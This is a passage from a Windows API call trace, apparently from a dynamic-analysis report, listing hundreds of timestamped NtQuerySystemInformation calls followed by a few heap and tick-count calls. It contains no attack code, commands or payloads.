ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f250, Length=0x20, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x20, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x20, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x58, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f270, Length=0x28, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2f0, Length=0x28, ResultLength=0x0) [0209.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2f0, Length=0x28, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f190, Length=0x20, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x20, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x20, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x20, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f250, Length=0x20, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x20, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x20, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x58, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f270, Length=0x28, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2f0, Length=0x28, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2f0, Length=0x28, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f250, Length=0x20, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x20, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x20, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x20, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f250, Length=0x20, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x20, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x20, ResultLength=0x0) [0209.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x58, ResultLength=0x0) [0209.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f390, Length=0x38, ResultLength=0x0) [0209.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x28, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x28, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x28, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x28, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f240, Length=0x28, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f390, Length=0x38, ResultLength=0x0) [0209.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f390, Length=0x38, ResultLength=0x0) [0209.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x28, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x28, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f390, Length=0x38, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f390, Length=0x38, ResultLength=0x0) [0209.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x20, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x20, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x20, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x20, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f300, Length=0x20, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f390, Length=0x38, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x20, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1a0, Length=0x20, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1a0, Length=0x20, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1a0, Length=0x20, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f390, Length=0x38, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x20, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1a0, Length=0x20, ResultLength=0x0) [0209.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1a0, Length=0x20, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1a0, Length=0x20, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f390, Length=0x38, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x20, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x20, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x20, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f730, Length=0x20, ResultLength=0x0) [0209.151] GetTickCount () returned 0x1174f6b [0209.151] GetProcessHeap () returned 0x2026c630000 [0209.151] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d71a1a0 [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x30, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x38, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x38, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x38, ResultLength=0x0) [0209.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f360, Length=0x30, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x38, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x30, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x38, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x38, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f320, Length=0x30, ResultLength=0x0) [0209.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f280, Length=0x20, ResultLength=0x0) [0209.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f320, Length=0x30, ResultLength=0x0) [0209.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f260, Length=0x30, ResultLength=0x0) [0209.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x38, 